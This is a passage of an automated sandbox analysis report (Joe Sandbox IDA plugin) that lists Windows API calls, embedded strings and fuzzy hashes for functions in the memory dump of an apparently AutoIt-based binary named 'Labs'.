                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 839392675-0
                                                    • Opcode ID: 7906c470f90f9834ebd73270715b71abc47ba6f0190c9d26cd013df11eff0750
                                                    • Instruction ID: 8cca1c44bc0954c9463effe5e77c7d859c70f214c4c79512ce4e1636cc8b6a3a
                                                    • Opcode Fuzzy Hash: 7906c470f90f9834ebd73270715b71abc47ba6f0190c9d26cd013df11eff0750
                                                    • Instruction Fuzzy Hash: A0F03032641258BBE7615B929C0DFEF7B7CFFC6B11F00015AFA15D1150DBB11A118AB5
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 007D77FE
                                                    • EnterCriticalSection.KERNEL32(?,?,0077C2B6,?,?), ref: 007D780F
                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,0077C2B6,?,?), ref: 007D781C
                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0077C2B6,?,?), ref: 007D7829
                                                      • Part of subcall function 007D71F0: CloseHandle.KERNEL32(00000000,?,007D7836,?,0077C2B6,?,?), ref: 007D71FA
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 007D783C
                                                    • LeaveCriticalSection.KERNEL32(?,?,0077C2B6,?,?), ref: 007D7843
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: d715789f3f98c0a01735db32f6ee3792c6f93ee6c3c5f5819861539c31653bd4
                                                    • Instruction ID: 5476ae84883a2dd1592a93d0c049a950f638cd62aebcda84c0a9300ec2875e43
                                                    • Opcode Fuzzy Hash: d715789f3f98c0a01735db32f6ee3792c6f93ee6c3c5f5819861539c31653bd4
                                                    • Instruction Fuzzy Hash: A0F05832945212AFD7962B64EC8DBAB773AFF49302F151422F202A51B1DBB95801DF60
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007C9555
                                                    • UnloadUserProfile.USERENV(?,?), ref: 007C9561
                                                    • CloseHandle.KERNEL32(?), ref: 007C956A
                                                    • CloseHandle.KERNEL32(?), ref: 007C9572
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007C957B
                                                    • HeapFree.KERNEL32(00000000), ref: 007C9582
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: fc111f7fb4d38e5bc9b6e6f35d05f26caa7d4b800e7d44aeb3ec5943e620658b
                                                    • Instruction ID: 1c18c533840e45a4d1678bc5e08cf5ee2995cca8ce08a7efe82ba71e3cbb5aa3
                                                    • Opcode Fuzzy Hash: fc111f7fb4d38e5bc9b6e6f35d05f26caa7d4b800e7d44aeb3ec5943e620658b
                                                    • Instruction Fuzzy Hash: EEE0E536104101BBDB821FE1EC0CA5ABF39FF49722F104220F21981170CB32A460DF90
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 007E8CFD
                                                    • CharUpperBuffW.USER32(?,?), ref: 007E8E0C
                                                    • VariantClear.OLEAUT32(?), ref: 007E8F84
                                                      • Part of subcall function 007D7B1D: VariantInit.OLEAUT32(00000000), ref: 007D7B5D
                                                      • Part of subcall function 007D7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 007D7B66
                                                      • Part of subcall function 007D7B1D: VariantClear.OLEAUT32(00000000), ref: 007D7B72
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: 803fb6c19a65b4aa83622efa83862c80e339162077ffd782aa658cb4adb6f275
                                                    • Instruction ID: 17837e38d7c7b29e99e7ea490574ea1593b22796bdacbab3e7e1fefceafb1e5f
                                                    • Opcode Fuzzy Hash: 803fb6c19a65b4aa83622efa83862c80e339162077ffd782aa658cb4adb6f275
                                                    • Instruction Fuzzy Hash: 7A919C70604341DFCB50DF25C88495ABBF5EF89354F04896EF89A8B3A2DB35E905CB92
                                                    APIs
                                                      • Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D
                                                    • _memset.LIBCMT ref: 007D332E
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D335D
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D3410
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007D343E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 4152858687-4108050209
                                                    • Opcode ID: da8799c35751f6b9094025d13f8ddd35c40984ded4fe2123d5fd6221e5f14a33
                                                    • Instruction ID: 7eec3bb623d783c658b319bd703807979a610ce5aa2e01080a28998a698e7f32
                                                    • Opcode Fuzzy Hash: da8799c35751f6b9094025d13f8ddd35c40984ded4fe2123d5fd6221e5f14a33
                                                    • Instruction Fuzzy Hash: DF51CF716083419BD725AB28D94567BB7F8AF45320F040A2EF895E3291DB7CDA44CB93
                                                    APIs
                                                    • _memset.LIBCMT ref: 007D2F67
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007D2F83
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 007D2FC9
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00837890,00000000), ref: 007D3012
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem_memset
                                                    • String ID: 0
                                                    • API String ID: 1173514356-4108050209
                                                    • Opcode ID: 6cc560d08c91ae11037ead9d25cba6513fbf880cb1dc9b27c8c7496660bfb030
                                                    • Instruction ID: 560110a9e3c82988b890104215af3ea2ce8989b882a7ffd778fd1fd826698a15
                                                    • Opcode Fuzzy Hash: 6cc560d08c91ae11037ead9d25cba6513fbf880cb1dc9b27c8c7496660bfb030
                                                    • Instruction Fuzzy Hash: 01418071208341DFD720DF24C888B5ABBF9AF84310F144A1EF5A5A7392D778EA06CB52
                                                    APIs
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                      • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007C9ACC
                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007C9ADF
                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 007C9B0F
                                                      • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$_memmove$ClassName
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 365058703-1403004172
                                                    • Opcode ID: 34ea4096258d236899dd0bf2c64ed22db51a5544d07af3accda4d01ca87fabac
                                                    • Instruction ID: 3d8222e7b898e7b39d448a323faacdc9df7e92e0089937b178d7b4026c9e320b
                                                    • Opcode Fuzzy Hash: 34ea4096258d236899dd0bf2c64ed22db51a5544d07af3accda4d01ca87fabac
                                                    • Instruction Fuzzy Hash: 9721F0B1940104BEDB58ABA0EC4AEFEBB6DEF51360F50421DF925932D0DE3D4D0A9B20
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007E1F18
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E1F3E
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007E1F6E
                                                    • InternetCloseHandle.WININET(00000000), ref: 007E1FB5
                                                      • Part of subcall function 007E2B4F: GetLastError.KERNEL32(?,?,007E1EE3,00000000,00000000,00000001), ref: 007E2B64
                                                      • Part of subcall function 007E2B4F: SetEvent.KERNEL32(?,?,007E1EE3,00000000,00000000,00000001), ref: 007E2B79
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3113390036-3916222277
                                                    • Opcode ID: 171b68e736c42afeffaa9c5141dacc26f471b30609df35f3cae4171edf2e49ec
                                                    • Instruction ID: a45ab5063406f9ac1aa5d0cd8a42a485007cfbd1f21414ebad168b534a9f9523
                                                    • Opcode Fuzzy Hash: 171b68e736c42afeffaa9c5141dacc26f471b30609df35f3cae4171edf2e49ec
                                                    • Instruction Fuzzy Hash: 0221BEB1606248BEEB119F658C8AFBF77ADFB4C744F10011AF405A6240EB399D059BA1
                                                    APIs
                                                      • Part of subcall function 00772111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077214F
                                                      • Part of subcall function 00772111: GetStockObject.GDI32(00000011), ref: 00772163
                                                      • Part of subcall function 00772111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0077216D
                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007F6A86
                                                    • LoadLibraryW.KERNEL32(?), ref: 007F6A8D
                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007F6AA2
                                                    • DestroyWindow.USER32(?), ref: 007F6AAA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                    • String ID: SysAnimate32
                                                    • API String ID: 4146253029-1011021900
                                                    • Opcode ID: 74c5101f6c38d6dc54d7ab2c5076f664614bc402f8f7f367e6926f9c3049a0ad
                                                    • Instruction ID: d44a591fbaa8a545450d22c2d4ff12bb8621d1a68fe3dd3a4e0932d43a4ff14c
                                                    • Opcode Fuzzy Hash: 74c5101f6c38d6dc54d7ab2c5076f664614bc402f8f7f367e6926f9c3049a0ad
                                                    • Instruction Fuzzy Hash: 57218B71200209AFEF108E689C81EBB77A9FB59324F10C619FB50A2290D739DC51AB60
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 007D7377
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D73AA
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 007D73BC
                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 007D73F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: 61d9a0b3d52d4f9d1568e98db24b09c331115bcc38a4722b66e79fd166381748
                                                    • Instruction ID: 243fccf0defaad787e1ff41312ee3b095f6cb118e2383de91fe6fe1aa892f7fe
                                                    • Opcode Fuzzy Hash: 61d9a0b3d52d4f9d1568e98db24b09c331115bcc38a4722b66e79fd166381748
                                                    • Instruction Fuzzy Hash: 7421607150834AABDB249F69DC49A9A7BB4BF44720F204A1AFCA1D73E0E774D850DB90
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 007D7444
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D7476
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 007D7487
                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 007D74C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CreateHandle$FilePipe
                                                    • String ID: nul
                                                    • API String ID: 4209266947-2873401336
                                                    • Opcode ID: e1768a848a39da65903b48f03b20ac4f5ea71a677d224b23184dd492c61e006d
                                                    • Instruction ID: 722adb2c05bd204612e3f505865db5f1451be7dcce47383874bf3877fedad77f
                                                    • Opcode Fuzzy Hash: e1768a848a39da65903b48f03b20ac4f5ea71a677d224b23184dd492c61e006d
                                                    • Instruction Fuzzy Hash: 9821C1316083469BDB259F689C49E9A7BB8BF45730F200B0AFDA0D73D0EB749840CB50
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 007DB297
                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007DB2EB
                                                    • __swprintf.LIBCMT ref: 007DB304
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00800980), ref: 007DB342
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                    • String ID: %lu
                                                    • API String ID: 3164766367-685833217
                                                    • Opcode ID: 5f1ae6cb0bc2053e7e31d6d3399683ec71ec9c28e7967eb8a607798f28dba573
                                                    • Instruction ID: 9de5a25b85a3a5f66c640d987f3ac263227b450c41b8531175a767f5fa29de47
                                                    • Opcode Fuzzy Hash: 5f1ae6cb0bc2053e7e31d6d3399683ec71ec9c28e7967eb8a607798f28dba573
                                                    • Instruction Fuzzy Hash: 3C214C34A00108EFCB10DFA5C849EAEB7B8EF89704B108069F909D7352DB35AA45DB61
                                                    APIs
                                                      • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                      • Part of subcall function 007CAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007CAA6F
                                                      • Part of subcall function 007CAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 007CAA82
                                                      • Part of subcall function 007CAA52: GetCurrentThreadId.KERNEL32 ref: 007CAA89
                                                      • Part of subcall function 007CAA52: AttachThreadInput.USER32(00000000), ref: 007CAA90
                                                    • GetFocus.USER32 ref: 007CAC2A
                                                      • Part of subcall function 007CAA9B: GetParent.USER32(?), ref: 007CAAA9
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 007CAC73
                                                    • EnumChildWindows.USER32(?,007CACEB), ref: 007CAC9B
                                                    • __swprintf.LIBCMT ref: 007CACB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                    • String ID: %s%d
                                                    • API String ID: 1941087503-1110647743
                                                    • Opcode ID: 39848d20d936fd7690aa978b11bb3f997ce34dc41046bd210e3af57bf3a4d42a
                                                    • Instruction ID: d6bb4337a87dce2e43770e843b7b62ce1dae7f9623f94833ec9673dec45b823f
                                                    • Opcode Fuzzy Hash: 39848d20d936fd7690aa978b11bb3f997ce34dc41046bd210e3af57bf3a4d42a
                                                    • Instruction Fuzzy Hash: DA11CD75600208BBDF11BFA09D8AFAA376CAB44315F0080ADFE18AA182CA7959459B71
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 007D2318
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                    • API String ID: 3964851224-769500911
                                                    • Opcode ID: ba5c59a7d334c6add3b63a407c910c2fdbb9e5133222c8372b842ef4685c138d
                                                    • Instruction ID: 9e6b0eafa10e2464658ebe5f0265e469944919d7d19ac5f0d6303183ace31c69
                                                    • Opcode Fuzzy Hash: ba5c59a7d334c6add3b63a407c910c2fdbb9e5133222c8372b842ef4685c138d
                                                    • Instruction Fuzzy Hash: 75117C30A10128DFCF04EFA4E8504EEB3B8FF25304B508069D814A7352EB3A5D5BCB90
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007EF2F0
                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 007EF320
                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 007EF453
                                                    • CloseHandle.KERNEL32(?), ref: 007EF4D4
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                    • String ID:
                                                    • API String ID: 2364364464-0
                                                    • Opcode ID: 6b9536e3d3115713488ed6c88fa47d870a5de3568b0c75e05c8d39deab5e4dce
                                                    • Instruction ID: 1569494d1650a4e1dd342d5c0a5046135efb8eac11458d9866dead4932646c42
                                                    • Opcode Fuzzy Hash: 6b9536e3d3115713488ed6c88fa47d870a5de3568b0c75e05c8d39deab5e4dce
                                                    • Instruction Fuzzy Hash: D1816071604700DFDB20EF29D886F2AB7E5AF48750F14891DFA99DB2D2D7B4AC408B91
                                                    APIs
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                      • Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F075D
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F079C
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007F07E3
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 007F080F
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 007F081C
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
